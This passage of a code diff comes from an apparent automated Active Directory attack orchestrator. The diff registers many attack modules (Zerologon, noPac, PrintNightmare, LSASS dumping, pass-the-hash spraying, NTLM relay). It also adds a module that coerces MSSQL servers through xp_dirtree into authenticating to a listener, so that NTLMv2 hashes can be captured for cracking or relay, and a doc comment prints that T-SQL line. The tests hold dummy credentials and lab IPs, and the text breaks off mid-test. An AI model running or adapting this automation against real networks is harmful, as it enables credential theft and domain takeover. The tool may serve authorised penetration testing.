+ .throttled_submit("recon", "recon", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ "MachineAccountQuota check dispatched"
+ );
+
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_MACHINE_ACCOUNT_QUOTA, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(
+ &dispatcher.queue,
+ DEDUP_MACHINE_ACCOUNT_QUOTA,
+ &item.dedup_key,
+ )
+ .await;
+ }
+ Ok(None) => {
+ debug!(domain = %item.domain, "MAQ check deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, domain = %item.domain, "Failed to dispatch MAQ check");
+ }
+ }
+ }
+ }
+}
+
+struct MaqWork {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("maq:{}", "contoso.local");
+ assert_eq!(key, "maq:contoso.local");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_MACHINE_ACCOUNT_QUOTA, "machine_account_quota");
+ }
+
+ #[test]
+ fn payload_structure_has_correct_technique() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let payload = json!({
+ "technique": "machine_account_quota_check",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+ assert_eq!(payload["technique"], "machine_account_quota_check");
+ assert_eq!(payload["target_ip"], "192.168.58.10");
+ assert_eq!(payload["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = MaqWork {
+ dedup_key: "maq:contoso.local".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ credential: cred,
+ };
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.dc_ip, "192.168.58.10");
+ assert_eq!(work.dedup_key, "maq:contoso.local");
+ }
+
+ #[test]
+ fn dedup_key_normalizes_domain() {
+ let key = format!("maq:{}", "CONTOSO.LOCAL".to_lowercase());
+ assert_eq!(key, "maq:contoso.local");
+ }
+
+ // --- collect_maq_work tests ---
+
+ use crate::orchestrator::state::StateInner;
+
+ fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: uuid::Uuid::new_v4().to_string(),
+ username: username.to_string(),
+ password: "P@ssw0rd!".to_string(), // pragma: allowlist secret
+ domain: domain.to_string(),
+ source: String::new(),
+ discovered_at: None,
+ is_admin: false,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ #[test]
+ fn collect_empty_state_produces_no_work() {
+ let state = StateInner::new("test".into());
+ let work = collect_maq_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_produces_no_work() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_maq_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dc_with_matching_cred_produces_work() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ let work = collect_maq_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dc_ip, "192.168.58.10");
+ assert_eq!(work[0].dedup_key, "maq:contoso.local");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_skips_already_processed_dedup() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ state.mark_processed(DEDUP_MACHINE_ACCOUNT_QUOTA, "maq:contoso.local".into());
+ let work = collect_maq_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_falls_back_to_first_credential() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ // Only fabrikam cred available, should fall back to first
+ state
+ .credentials
+ .push(make_cred("fabuser", "fabrikam.local"));
+ let work = collect_maq_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "fabuser");
+ }
+
+ #[test]
+ fn collect_multiple_domains_produces_multiple_work() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ state
+ .credentials
+ .push(make_cred("fabadmin", "fabrikam.local"));
+ let work = collect_maq_work(&state);
+ assert_eq!(work.len(), 2);
+ }
+
+ #[test]
+ fn collect_prefers_same_domain_credential() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_cred("fabuser", "fabrikam.local"));
+ state
+ .credentials
+ .push(make_cred("conuser", "contoso.local"));
+ let work = collect_maq_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "conuser");
+ }
+
+ #[test]
+ fn collect_case_insensitive_domain_match() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ let work = collect_maq_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dedup_key, "maq:contoso.local");
+ }
+
+ #[test]
+ fn dedup_keys_differ_per_domain() {
+ let key1 = format!("maq:{}", "contoso.local");
+ let key2 = format!("maq:{}", "fabrikam.local");
+ assert_ne!(key1, key2);
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/mod.rs b/ares-cli/src/orchestrator/automation/mod.rs
index bb8cfd3a..5141a35d 100644
--- a/ares-cli/src/orchestrator/automation/mod.rs
+++ b/ares-cli/src/orchestrator/automation/mod.rs
@@ -13,59 +13,130 @@
//! all threading hacks since tokio tasks are truly concurrent.
mod acl;
+mod acl_discovery;
mod adcs;
mod adcs_exploitation;
mod bloodhound;
+mod certifried;
+mod certipy_auth;
mod coercion;
mod crack;
mod credential_access;
mod credential_expansion;
mod credential_reuse;
+mod cross_forest_enum;
+mod dacl_abuse;
mod delegation;
+mod dfs_coercion;
+mod dns_enum;
+mod domain_user_enum;
+mod foreign_group_enum;
mod gmsa;
+mod golden_cert;
mod golden_ticket;
mod gpo;
+mod gpp_sysvol;
+mod group_enumeration;
+mod krbrelayup;
mod laps;
+mod ldap_signing;
+mod localuser_spray;
+mod lsassy_dump;
+mod machine_account_quota;
mod mssql;
+mod mssql_coercion;
mod mssql_exploitation;
+mod nopac;
+mod ntlm_relay;
+mod ntlmv1_downgrade;
+mod password_policy;
+mod petitpotam_unauth;
+mod print_nightmare;
+mod pth_spray;
mod rbcd;
+mod rdp_lateral;
mod refresh;
mod s4u;
+mod searchconnector_coercion;
mod secretsdump;
mod shadow_credentials;
+mod share_coercion;
mod share_enum;
mod shares;
+mod sid_enumeration;
+mod smb_signing;
+mod smbclient_enum;
+mod spooler_check;
mod stall_detection;
mod trust;
mod unconstrained;
+mod webdav_detection;
+mod winrm_lateral;
+mod zerologon;
// Re-export all public task functions at the same paths they had before the split.
pub use acl::auto_acl_chain_follow;
+pub use acl_discovery::auto_acl_discovery;
pub use adcs::auto_adcs_enumeration;
pub use adcs_exploitation::auto_adcs_exploitation;
+pub(crate) use adcs_exploitation::EXPLOITABLE_ESC_TYPES;
pub use bloodhound::auto_bloodhound;
+pub use certifried::auto_certifried;
+pub use certipy_auth::auto_certipy_auth;
pub use coercion::auto_coercion;
pub use crack::auto_crack_dispatch;
pub use credential_access::auto_credential_access;
pub use credential_expansion::auto_credential_expansion;
pub use credential_reuse::auto_credential_reuse;
+pub use cross_forest_enum::auto_cross_forest_enum;
+pub use dacl_abuse::auto_dacl_abuse;
pub use delegation::auto_delegation_enumeration;
+pub use dfs_coercion::auto_dfs_coercion;
+pub use dns_enum::auto_dns_enum;
+pub use domain_user_enum::auto_domain_user_enum;
+pub use foreign_group_enum::auto_foreign_group_enum;
pub use gmsa::auto_gmsa_extraction;
+pub use golden_cert::auto_golden_cert;
pub use golden_ticket::auto_golden_ticket;
pub use gpo::auto_gpo_abuse;
+pub use gpp_sysvol::auto_gpp_sysvol;
+pub use group_enumeration::auto_group_enumeration;
+pub use krbrelayup::auto_krbrelayup;
pub use laps::auto_laps_extraction;
+pub use ldap_signing::auto_ldap_signing;
+pub use localuser_spray::auto_localuser_spray;
+pub use lsassy_dump::auto_lsassy_dump;
+pub use machine_account_quota::auto_machine_account_quota;
pub use mssql::auto_mssql_detection;
+pub use mssql_coercion::auto_mssql_coercion;
pub use mssql_exploitation::auto_mssql_exploitation;
+pub use nopac::auto_nopac;
+pub use ntlm_relay::auto_ntlm_relay;
+pub use ntlmv1_downgrade::auto_ntlmv1_downgrade;
+pub use password_policy::auto_password_policy;
+pub use petitpotam_unauth::auto_petitpotam_unauth;
+pub use print_nightmare::auto_print_nightmare;
+pub use pth_spray::auto_pth_spray;
pub use rbcd::auto_rbcd_exploitation;
+pub use rdp_lateral::auto_rdp_lateral;
pub use refresh::state_refresh;
pub use s4u::auto_s4u_exploitation;
+pub use searchconnector_coercion::auto_searchconnector_coercion;
pub use secretsdump::auto_local_admin_secretsdump;
pub use shadow_credentials::auto_shadow_credentials;
+pub use share_coercion::auto_share_coercion;
pub use share_enum::auto_share_enumeration;
pub use shares::auto_share_spider;
+pub use sid_enumeration::auto_sid_enumeration;
+pub use smb_signing::auto_smb_signing_detection;
+pub use smbclient_enum::auto_smbclient_enum;
+pub use spooler_check::auto_spooler_check;
pub use stall_detection::auto_stall_detection;
pub use trust::auto_trust_follow;
pub use unconstrained::auto_unconstrained_exploitation;
+pub use webdav_detection::auto_webdav_detection;
+pub use winrm_lateral::auto_winrm_lateral;
+pub use zerologon::auto_zerologon;
pub(crate) fn crack_dedup_key(hash: &ares_core::models::Hash) -> String {
let prefix = &hash.hash_value[..32.min(hash.hash_value.len())];
diff --git a/ares-cli/src/orchestrator/automation/mssql_coercion.rs b/ares-cli/src/orchestrator/automation/mssql_coercion.rs
new file mode 100644
index 00000000..a9e9fbfa
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/mssql_coercion.rs
@@ -0,0 +1,698 @@
+//! auto_mssql_coercion -- coerce NTLM authentication from MSSQL servers via
+//! xp_dirtree/xp_fileexist.
+//!
+//! When we have MSSQL access (discovered by `auto_mssql_detection`) and a
+//! listener IP, we can force the SQL Server service account to authenticate
+//! back to our listener, capturing its NTLMv2 hash for cracking or relay.
+//!
+//! This is distinct from the general `auto_coercion` module which uses
+//! PetitPotam/PrinterBug against DCs.
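+//!
+//! The coercion primitive itself is a single T-SQL call (illustrative; the
+//! worker issues an equivalent through its MSSQL tooling):
+//!
+//! ```text
+//! EXEC master.sys.xp_dirtree '\\<listener_ip>\x', 1, 1;
+//! -- the SQL Server service account authenticates to <listener_ip> over SMB,
+//! -- where the listener captures the NTLMv2 exchange
+//! ```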
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Monitors for MSSQL servers and dispatches xp_dirtree NTLM coercion.
+/// Interval: 45s.
+pub async fn auto_mssql_coercion(
+    dispatcher: Arc<Dispatcher>,
+    mut shutdown: watch::Receiver<bool>,
+) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("mssql_coercion") {
+ continue;
+ }
+
+ let listener = match dispatcher.config.listener_ip.as_deref() {
+ Some(ip) => ip.to_string(),
+ None => continue,
+ };
+
+        let work: Vec<MssqlCoercionWork> = {
+ let state = dispatcher.state.read().await;
+ collect_mssql_coercion_work(&state, &listener)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "mssql_ntlm_coercion",
+ "target_ip": item.target_ip,
+ "listener_ip": item.listener,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("mssql_coercion");
+ match dispatcher
+ .throttled_submit("coercion", "coercion", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ target = %item.target_ip,
+ "MSSQL xp_dirtree NTLM coercion dispatched"
+ );
+
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_MSSQL_COERCION, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_MSSQL_COERCION, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(target = %item.target_ip, "MSSQL coercion task deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, target = %item.target_ip, "Failed to dispatch MSSQL coercion");
+ }
+ }
+ }
+ }
+}
+
+/// Collect MSSQL coercion work items from the current state.
+///
+/// Extracted from the async loop so it can be unit-tested without a
+/// `Dispatcher` or real async runtime scaffolding.
+fn collect_mssql_coercion_work(
+ state: &crate::orchestrator::state::StateInner,
+ listener: &str,
+) -> Vec<MssqlCoercionWork> {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for vuln in state.discovered_vulnerabilities.values() {
+ if vuln.vuln_type.to_lowercase() != "mssql_access" {
+ continue;
+ }
+
+ let target_ip = vuln
+ .details
+ .get("target_ip")
+ .and_then(|v| v.as_str())
+ .unwrap_or(&vuln.target);
+
+ if target_ip.is_empty() {
+ continue;
+ }
+
+ let dedup_key = format!("mssql_coerce:{target_ip}");
+ if state.is_processed(DEDUP_MSSQL_COERCION, &dedup_key) {
+ continue;
+ }
+
+ let domain = vuln
+ .details
+ .get("domain")
+ .and_then(|v| v.as_str())
+ .unwrap_or("")
+ .to_string();
+
+ let cred = state
+ .credentials
+ .iter()
+ .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain.to_lowercase())
+ .or_else(|| state.credentials.first())
+ .cloned();
+
+ let cred = match cred {
+ Some(c) => c,
+ None => continue,
+ };
+
+ items.push(MssqlCoercionWork {
+ dedup_key,
+ target_ip: target_ip.to_string(),
+ listener: listener.to_string(),
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+struct MssqlCoercionWork {
+ dedup_key: String,
+ target_ip: String,
+ listener: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("mssql_coerce:{}", "192.168.58.22");
+ assert_eq!(key, "mssql_coerce:192.168.58.22");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_MSSQL_COERCION, "mssql_coercion");
+ }
+
+ #[test]
+ fn mssql_access_vuln_type_matching() {
+ assert_eq!("mssql_access".to_lowercase(), "mssql_access");
+ assert_ne!("smb_signing_disabled".to_lowercase(), "mssql_access");
+ }
+
+ #[test]
+ fn target_ip_from_vuln_details() {
+ let details = serde_json::json!({"target_ip": "192.168.58.22"});
+ let target = details
+ .get("target_ip")
+ .and_then(|v| v.as_str())
+ .unwrap_or("fallback");
+ assert_eq!(target, "192.168.58.22");
+ }
+
+ #[test]
+ fn target_ip_fallback_to_vuln_target() {
+ let details = serde_json::json!({});
+ let fallback = "192.168.58.10";
+ let target = details
+ .get("target_ip")
+ .and_then(|v| v.as_str())
+ .unwrap_or(fallback);
+ assert_eq!(target, "192.168.58.10");
+ }
+
+ #[test]
+ fn credential_domain_matching() {
+ let domain = "contoso.local".to_string();
+ let cred_domain = "CONTOSO.LOCAL";
+ let matches = !domain.is_empty() && cred_domain.to_lowercase() == domain.to_lowercase();
+ assert!(matches);
+ }
+
+ #[test]
+ fn credential_domain_empty_no_match() {
+ let domain = "".to_string();
+ let cred_domain = "contoso.local";
+ let matches = !domain.is_empty() && cred_domain.to_lowercase() == domain.to_lowercase();
+ assert!(!matches);
+ }
+
+ #[test]
+ fn mssql_coercion_payload_structure() {
+ let payload = serde_json::json!({
+ "technique": "mssql_ntlm_coercion",
+ "target_ip": "192.168.58.22",
+ "listener_ip": "192.168.58.100",
+ "credential": {
+ "username": "sa",
+ "password": "P@ssw0rd!",
+ "domain": "contoso.local",
+ },
+ });
+ assert_eq!(payload["technique"], "mssql_ntlm_coercion");
+ assert_eq!(payload["target_ip"], "192.168.58.22");
+ assert_eq!(payload["listener_ip"], "192.168.58.100");
+ assert_eq!(payload["credential"]["username"], "sa");
+ }
+
+ #[test]
+ fn domain_extraction_from_vuln() {
+ let details = serde_json::json!({"domain": "contoso.local"});
+ let domain = details
+ .get("domain")
+ .and_then(|v| v.as_str())
+ .unwrap_or("")
+ .to_string();
+ assert_eq!(domain, "contoso.local");
+
+ let details2 = serde_json::json!({});
+ let domain2 = details2
+ .get("domain")
+ .and_then(|v| v.as_str())
+ .unwrap_or("")
+ .to_string();
+ assert_eq!(domain2, "");
+ }
+
+ #[test]
+ fn mssql_coercion_work_fields() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "sa".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = MssqlCoercionWork {
+ dedup_key: "mssql_coerce:192.168.58.22".into(),
+ target_ip: "192.168.58.22".into(),
+ listener: "192.168.58.100".into(),
+ credential: cred,
+ };
+ assert_eq!(work.target_ip, "192.168.58.22");
+ assert_eq!(work.listener, "192.168.58.100");
+ }
+
+ // --- collect_mssql_coercion_work integration tests ---
+
+ use crate::orchestrator::state::SharedState;
+
+ fn make_cred(user: &str, domain: &str) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: format!("c-{user}"),
+ username: user.into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ fn make_vuln(
+ id: &str,
+ vuln_type: &str,
+ target: &str,
+ details: serde_json::Value,
+ ) -> ares_core::models::VulnerabilityInfo {
+        let details_map: std::collections::HashMap<String, serde_json::Value> =
+ serde_json::from_value(details).unwrap_or_default();
+ ares_core::models::VulnerabilityInfo {
+ vuln_id: id.into(),
+ vuln_type: vuln_type.into(),
+ target: target.into(),
+ discovered_by: "test".into(),
+ discovered_at: chrono::Utc::now(),
+ details: details_map,
+ recommended_agent: String::new(),
+ priority: 5,
+ }
+ }
+
+ #[tokio::test]
+ async fn collect_empty_state_returns_nothing() {
+ let shared = SharedState::new("test".into());
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_no_vulns_with_creds_returns_nothing() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state.credentials.push(make_cred("sa", "contoso.local"));
+ }
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_mssql_access_vuln_produces_work() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state.credentials.push(make_cred("sa", "contoso.local"));
+ state.discovered_vulnerabilities.insert(
+ "v1".into(),
+ make_vuln(
+ "v1",
+ "mssql_access",
+ "192.168.58.22",
+ json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}),
+ ),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_ip, "192.168.58.22");
+ assert_eq!(work[0].listener, "192.168.58.100");
+ assert_eq!(work[0].dedup_key, "mssql_coerce:192.168.58.22");
+ assert_eq!(work[0].credential.username, "sa");
+ assert_eq!(work[0].credential.domain, "contoso.local");
+ }
+
+ #[tokio::test]
+ async fn collect_skips_non_mssql_vulns() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state.credentials.push(make_cred("sa", "contoso.local"));
+ state.discovered_vulnerabilities.insert(
+ "v1".into(),
+ make_vuln(
+ "v1",
+ "smb_signing_disabled",
+ "192.168.58.22",
+ json!({"target_ip": "192.168.58.22"}),
+ ),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_dedup_skips_already_processed() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state.credentials.push(make_cred("sa", "contoso.local"));
+ state.discovered_vulnerabilities.insert(
+ "v1".into(),
+ make_vuln(
+ "v1",
+ "mssql_access",
+ "192.168.58.22",
+ json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}),
+ ),
+ );
+ state.mark_processed(DEDUP_MSSQL_COERCION, "mssql_coerce:192.168.58.22".into());
+ }
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_target_ip_falls_back_to_vuln_target() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state.credentials.push(make_cred("sa", "contoso.local"));
+ state.discovered_vulnerabilities.insert(
+ "v1".into(),
+ make_vuln("v1", "mssql_access", "192.168.58.30", json!({})),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_ip, "192.168.58.30");
+ }
+
+ #[tokio::test]
+ async fn collect_skips_empty_target_ip() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state.credentials.push(make_cred("sa", "contoso.local"));
+ state.discovered_vulnerabilities.insert(
+ "v1".into(),
+ make_vuln("v1", "mssql_access", "", json!({"target_ip": ""})),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_prefers_domain_matching_credential() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state.credentials.push(make_cred("admin", "fabrikam.local"));
+ state.credentials.push(make_cred("sa", "contoso.local"));
+ state.discovered_vulnerabilities.insert(
+ "v1".into(),
+ make_vuln(
+ "v1",
+ "mssql_access",
+ "192.168.58.22",
+ json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}),
+ ),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "sa");
+ assert_eq!(work[0].credential.domain, "contoso.local");
+ }
+
+ #[tokio::test]
+ async fn collect_falls_back_to_first_cred_when_no_domain_match() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state.credentials.push(make_cred("admin", "fabrikam.local"));
+ state.discovered_vulnerabilities.insert(
+ "v1".into(),
+ make_vuln(
+ "v1",
+ "mssql_access",
+ "192.168.58.22",
+ json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}),
+ ),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[tokio::test]
+ async fn collect_falls_back_to_first_cred_when_domain_empty() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state.credentials.push(make_cred("sa", "contoso.local"));
+ state.discovered_vulnerabilities.insert(
+ "v1".into(),
+ make_vuln(
+ "v1",
+ "mssql_access",
+ "192.168.58.22",
+ json!({"target_ip": "192.168.58.22"}),
+ ),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "sa");
+ }
+
+ #[tokio::test]
+ async fn collect_multiple_vulns_produce_multiple_work_items() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state.credentials.push(make_cred("sa", "contoso.local"));
+ state.discovered_vulnerabilities.insert(
+ "v1".into(),
+ make_vuln(
+ "v1",
+ "mssql_access",
+ "192.168.58.22",
+ json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}),
+ ),
+ );
+ state.discovered_vulnerabilities.insert(
+ "v2".into(),
+ make_vuln(
+ "v2",
+ "mssql_access",
+ "192.168.58.23",
+ json!({"target_ip": "192.168.58.23", "domain": "contoso.local"}),
+ ),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+ assert_eq!(work.len(), 2);
+ let ips: std::collections::HashSet<&str> =
+ work.iter().map(|w| w.target_ip.as_str()).collect();
+ assert!(ips.contains("192.168.58.22"));
+ assert!(ips.contains("192.168.58.23"));
+ }
+
+ #[tokio::test]
+ async fn collect_case_insensitive_vuln_type() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state.credentials.push(make_cred("sa", "contoso.local"));
+ state.discovered_vulnerabilities.insert(
+ "v1".into(),
+ make_vuln(
+ "v1",
+ "MSSQL_ACCESS",
+ "192.168.58.22",
+ json!({"target_ip": "192.168.58.22"}),
+ ),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+ assert_eq!(work.len(), 1);
+ }
+
+ #[tokio::test]
+ async fn collect_case_insensitive_domain_matching() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state.credentials.push(make_cred("sa", "CONTOSO.LOCAL"));
+ state.discovered_vulnerabilities.insert(
+ "v1".into(),
+ make_vuln(
+ "v1",
+ "mssql_access",
+ "192.168.58.22",
+ json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}),
+ ),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "sa");
+ }
+
+ #[tokio::test]
+ async fn collect_partial_dedup_only_skips_processed() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state.credentials.push(make_cred("sa", "contoso.local"));
+ state.discovered_vulnerabilities.insert(
+ "v1".into(),
+ make_vuln(
+ "v1",
+ "mssql_access",
+ "192.168.58.22",
+ json!({"target_ip": "192.168.58.22"}),
+ ),
+ );
+ state.discovered_vulnerabilities.insert(
+ "v2".into(),
+ make_vuln(
+ "v2",
+ "mssql_access",
+ "192.168.58.23",
+ json!({"target_ip": "192.168.58.23"}),
+ ),
+ );
+ state.mark_processed(DEDUP_MSSQL_COERCION, "mssql_coerce:192.168.58.22".into());
+ }
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_ip, "192.168.58.23");
+ }
+
+ #[tokio::test]
+ async fn collect_listener_propagated_to_work() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state.credentials.push(make_cred("sa", "contoso.local"));
+ state.discovered_vulnerabilities.insert(
+ "v1".into(),
+ make_vuln(
+ "v1",
+ "mssql_access",
+ "192.168.58.22",
+ json!({"target_ip": "192.168.58.22"}),
+ ),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].listener, "192.168.58.50");
+ }
+
+ #[tokio::test]
+ async fn collect_mixed_vuln_types_only_mssql_access() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state.credentials.push(make_cred("sa", "contoso.local"));
+ state.discovered_vulnerabilities.insert(
+ "v1".into(),
+ make_vuln(
+ "v1",
+ "mssql_access",
+ "192.168.58.22",
+ json!({"target_ip": "192.168.58.22"}),
+ ),
+ );
+ state.discovered_vulnerabilities.insert(
+ "v2".into(),
+ make_vuln(
+ "v2",
+ "constrained_delegation",
+ "192.168.58.23",
+ json!({"target_ip": "192.168.58.23"}),
+ ),
+ );
+ state.discovered_vulnerabilities.insert(
+ "v3".into(),
+ make_vuln(
+ "v3",
+ "mssql_impersonation",
+ "192.168.58.24",
+ json!({"target_ip": "192.168.58.24"}),
+ ),
+ );
+ }
+ let state = shared.read().await;
